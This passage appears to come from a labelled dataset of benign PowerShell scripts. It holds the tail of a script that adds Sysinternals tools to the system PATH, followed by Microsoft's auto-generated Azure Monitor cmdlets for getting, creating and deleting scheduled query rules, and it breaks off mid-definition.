$path.TrimEnd(('\\')); $path = $path.Replace('"',""); #$path =('"{0}"' -f $path) if ($pathArray -notcontains $path ) { " Appending " + $path + " to path" $pathArray += $path } else { " " + $path + " already in path" } } } else { $product + " not found" } [Array]::Sort([array]$pathArray) #$pathArray "" "Old Path: " ([Environment]::GetEnvironmentVariable('Path', 'Machine').Split(';'))|format-list "" "" [string] $newPath = [string]::Join(';', $pathArray); [Environment]::SetEnvironmentVariable('Path', $newPath, 'Machine'); "New Path: " ([Environment]::GetEnvironmentVariable('Path', 'Machine').Split(';'))|format-list } $wid=[System.Security.Principal.WindowsIdentity]::GetCurrent() $prp=new-object System.Security.Principal.WindowsPrincipal($wid) $adm=[System.Security.Principal.WindowsBuiltInRole]::Administrator $IsAdmin=$prp.IsInRole($adm) if($IsAdmin) { if ($args.Length -eq 0) { Get-Sysinternals } else { Get-Sysinternals $args[0] } #Get-Sysinternals "c:\\sys\\" } else { Write-Warning "This script requires running as an elevated administrator." }
combined_dataset/train/non-malicious/sample_49_22.ps1
sample_49_22.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Retrieve an scheduled query rule definition. .Description Retrieve an scheduled query rule definition. .Example Get-AzScheduledQueryRule .Example Get-AzScheduledQueryRule -ResourceGroupName "test-group" .Example Get-AzScheduledQueryRule -ResourceGroupName "test-group" -Name "test-rule" .Inputs Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity .Outputs Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. INPUTOBJECT <IScheduledQueryRuleIdentity>: Identity Parameter [Id <String>]: Resource identity path [ResourceGroupName <String>]: The name of the resource group. The name is case insensitive. [RuleName <String>]: The name of the rule. [SubscriptionId <String>]: The ID of the target subscription. .Link https://learn.microsoft.com/powershell/module/az.monitor/get-azscheduledqueryrule #> function Get-AzScheduledQueryRule { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource])] [CmdletBinding(DefaultParameterSetName='List', PositionalBinding=$false)] param( [Parameter(ParameterSetName='Get', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [System.String] # The name of the rule. ${Name}, [Parameter(ParameterSetName='Get', Mandatory)] [Parameter(ParameterSetName='List1', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter(ParameterSetName='Get')] [Parameter(ParameterSetName='List')] [Parameter(ParameterSetName='List1')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String[]] # The ID of the target subscription. ${SubscriptionId}, [Parameter(ParameterSetName='GetViaIdentity', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity] # Identity Parameter # To construct, see NOTES section for INPUTOBJECT properties and create a hash table. ${InputObject}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Azure')] [System.Management.Automation.PSObject] # The DefaultProfile parameter is not functional. # Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) begin { try { $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) { [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString() } $preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId if ($preTelemetryId -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString() [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet) } else { $internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets if ($internalCalledCmdlets -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name } else { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal' } $mapping = @{ Get = 'Az.ScheduledQueryRule.private\Get-AzScheduledQueryRule_Get'; GetViaIdentity = 'Az.ScheduledQueryRule.private\Get-AzScheduledQueryRule_GetViaIdentity'; List = 'Az.ScheduledQueryRule.private\Get-AzScheduledQueryRule_List'; List1 = 'Az.ScheduledQueryRule.private\Get-AzScheduledQueryRule_List1'; } if (('Get', 'List', 'List1') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) { $testPlayback = $false $PSBoundParameters['HttpPipelinePrepend'] | Foreach-Object { if ($_) { $testPlayback = $testPlayback -or ('Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.PipelineMock' -eq $_.Target.GetType().FullName -and 'Playback' -eq $_.Target.Mode) } } if ($testPlayback) { $PSBoundParameters['SubscriptionId'] = . (Join-Path $PSScriptRoot '..' 'utils' 'Get-SubscriptionIdTestSafe.ps1') } else { $PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id } } $cmdInfo = Get-Command -Name $mapping[$parameterSet] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){ [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name) } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } process { try { $steppablePipeline.Process($_) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } finally { $backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId $backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } } end { try { $steppablePipeline.End() [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets if ($preTelemetryId -eq '') { [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } } <# .Synopsis Creates or updates a scheduled query rule. .Description Creates or updates a scheduled query rule. .Example $subscriptionId=(Get-AzContext).Subscription.Id $dimension = New-AzScheduledQueryRuleDimensionObject -Name Computer -Operator Include -Value * $condition=New-AzScheduledQueryRuleConditionObject -Dimension $dimension -Query "Perf | where ObjectName == `"Processor`" and CounterName == `"% Processor Time`" | summarize AggregatedValue = avg(CounterValue) by bin(TimeGenerated, 5m), Computer" -TimeAggregation "Average" -MetricMeasureColumn "AggregatedValue" -Operator "GreaterThan" -Threshold "70" -FailingPeriodNumberOfEvaluationPeriod 1 -FailingPeriodMinFailingPeriodsToAlert 1 New-AzScheduledQueryRule -Name test-rule -ResourceGroupName test-group -Location eastus -DisplayName test-rule -Scope "/subscriptions/$subscriptionId/resourceGroups/test-group/providers/Microsoft.Compute/virtualMachines/test-vm" -Severity 4 -WindowSize ([System.TimeSpan]::New(0,10,0)) -EvaluationFrequency ([System.TimeSpan]::New(0,5,0)) -CriterionAllOf $condition .Outputs Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. CRITERIONALLOF <ICondition[]>: A list of conditions to evaluate against the specified scopes [Dimension <IDimension[]>]: List of Dimensions conditions Name <String>: Name of the dimension Operator <DimensionOperator>: Operator for dimension values Value <String[]>: List of dimension values [FailingPeriodMinFailingPeriodsToAlert <Int64?>]: The number of violations to trigger an alert. Should be smaller or equal to numberOfEvaluationPeriods. Default value is 1 [FailingPeriodNumberOfEvaluationPeriod <Int64?>]: The number of aggregated lookback points. The lookback time window is calculated based on the aggregation granularity (windowSize) and the selected number of aggregated points. Default value is 1 [MetricMeasureColumn <String>]: The column containing the metric measure number. Relevant only for rules of the kind LogAlert. [MetricName <String>]: The name of the metric to be sent. Relevant and required only for rules of the kind LogToMetric. [Operator <ConditionOperator?>]: The criteria operator. Relevant and required only for rules of the kind LogAlert. [Query <String>]: Log query alert [ResourceIdColumn <String>]: The column containing the resource id. The content of the column must be a uri formatted as resource id. Relevant only for rules of the kind LogAlert. [Threshold <Double?>]: the criteria threshold value that activates the alert. Relevant and required only for rules of the kind LogAlert. [TimeAggregation <TimeAggregation?>]: Aggregation type. Relevant and required only for rules of the kind LogAlert. .Link https://learn.microsoft.com/powershell/module/az.monitor/new-azscheduledqueryrule #> function New-AzScheduledQueryRule { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IScheduledQueryRuleResource])] [CmdletBinding(DefaultParameterSetName='CreateExpanded', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')] param( [Parameter(Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [System.String] # The name of the rule. ${Name}, [Parameter(Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String] # The ID of the target subscription. ${SubscriptionId}, [Parameter(Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # The geo-location where the resource lives ${Location}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.IActionsCustomProperties]))] [System.Collections.Hashtable] # The properties of an alert payload. ${ActionCustomProperty}, [Parameter()] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String[]] # Action Group resource Ids to invoke when the alert fires. ${ActionGroupResourceId}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Management.Automation.SwitchParameter] # The flag that indicates whether the alert should be automatically resolved or not. # The default is true. # Relevant only for rules of the kind LogAlert. ${AutoMitigate}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Management.Automation.SwitchParameter] # The flag which indicates whether this scheduled query rule should be stored in the customer's storage. # The default is false. # Relevant only for rules of the kind LogAlert. ${CheckWorkspaceAlertsStorageConfigured}, [Parameter()] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api20210801.ICondition[]] # A list of conditions to evaluate against the specified scopes # To construct, see NOTES section for CRITERIONALLOF properties and create a hash table. ${CriterionAllOf}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # The description of the scheduled query rule. ${Description}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String] # The display name of the alert rule ${DisplayName}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Management.Automation.SwitchParameter] # The flag which indicates whether this scheduled query rule is enabled. # Value should be true or false ${Enabled}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.TimeSpan] # How often the scheduled query rule is evaluated represented in ISO 8601 duration format. # Relevant and required only for rules of the kind LogAlert. ${EvaluationFrequency}, [Parameter()] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.Kind])] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Support.Kind] # Indicates the type of scheduled query rule. # The default is LogAlert. ${Kind}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.TimeSpan] # Mute actions for the chosen period of time (in ISO 8601 duration format) after the alert is fired. # Relevant only for rules of the kind LogAlert. ${MuteActionsDuration}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.TimeSpan] # If specified then overrides the query time range (default is WindowSize*NumberOfEvaluationPeriods). # Relevant only for rules of the kind LogAlert. ${OverrideQueryTimeRange}, [Parameter()] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String[]] # The list of resource id's that this scheduled query rule is scoped to. ${Scope}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Int64] # Severity of the alert. # Should be an integer between [0-4]. # Value of 0 is severest. # Relevant and required only for rules of the kind LogAlert. ${Severity}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.Management.Automation.SwitchParameter] # The flag which indicates whether the provided query should be validated or not. # The default is false. # Relevant only for rules of the kind LogAlert. ${SkipQueryValidation}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.Api10.ITrackedResourceTags]))] [System.Collections.Hashtable] # Resource tags. ${Tag}, [Parameter()] [AllowEmptyCollection()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.String[]] # List of resource type of the target resource(s) on which the alert is created/updated. # For example if the scope is a resource group and targetResourceTypes is Microsoft.Compute/virtualMachines, then a different alert will be fired for each virtual machine in the resource group which meet the alert criteria. # Relevant only for rules of the kind LogAlert ${TargetResourceType}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Body')] [System.TimeSpan] # The period of time (in ISO 8601 duration format) on which the Alert query will be executed (bin size). # Relevant and required only for rules of the kind LogAlert. ${WindowSize}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Azure')] [System.Management.Automation.PSObject] # The DefaultProfile parameter is not functional. # Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) begin { try { $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName if ($null -eq [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion) { [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PowerShellVersion = $PSVersionTable.PSVersion.ToString() } $preTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId if ($preTelemetryId -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId =(New-Guid).ToString() [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet) } else { $internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets if ($internalCalledCmdlets -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name } else { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal' } $mapping = @{ CreateExpanded = 'Az.ScheduledQueryRule.private\New-AzScheduledQueryRule_CreateExpanded'; } if (('CreateExpanded') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) { $testPlayback = $false $PSBoundParameters['HttpPipelinePrepend'] | Foreach-Object { if ($_) { $testPlayback = $testPlayback -or ('Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.PipelineMock' -eq $_.Target.GetType().FullName -and 'Playback' -eq $_.Target.Mode) } } if ($testPlayback) { $PSBoundParameters['SubscriptionId'] = . (Join-Path $PSScriptRoot '..' 'utils' 'Get-SubscriptionIdTestSafe.ps1') } else { $PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id } } $cmdInfo = Get-Command -Name $mapping[$parameterSet] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){ [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name) } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } process { try { $steppablePipeline.Process($_) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } finally { $backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId $backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } } end { try { $steppablePipeline.End() [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets if ($preTelemetryId -eq '') { [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } } <# .Synopsis Deletes a scheduled query rule. .Description Deletes a scheduled query rule. .Example Remove-AzScheduledQueryRule -ResourceGroupName "test-group" -Name "test-rule" .Inputs Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity .Outputs System.Boolean .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. INPUTOBJECT <IScheduledQueryRuleIdentity>: Identity Parameter [Id <String>]: Resource identity path [ResourceGroupName <String>]: The name of the resource group. The name is case insensitive. [RuleName <String>]: The name of the rule. [SubscriptionId <String>]: The ID of the target subscription. .Link https://learn.microsoft.com/powershell/module/az.monitor/remove-azscheduledqueryrule #> function Remove-AzScheduledQueryRule { [OutputType([System.Boolean])] [CmdletBinding(DefaultParameterSetName='Delete', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')] param( [Parameter(ParameterSetName='Delete', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [System.String] # The name of the rule. ${Name}, [Parameter(ParameterSetName='Delete', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter(ParameterSetName='Delete')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String] # The ID of the target subscription. ${SubscriptionId}, [Parameter(ParameterSetName='DeleteViaIdentity', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Models.IScheduledQueryRuleIdentity] # Identity Parameter # To construct, see NOTES section for INPUTOBJECT properties and create a hash table. ${InputObject}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Azure')] [System.Management.Automation.PSObject] # The DefaultProfile parameter is not functional. # Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Returns true when the command succeeds ${PassThru}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] 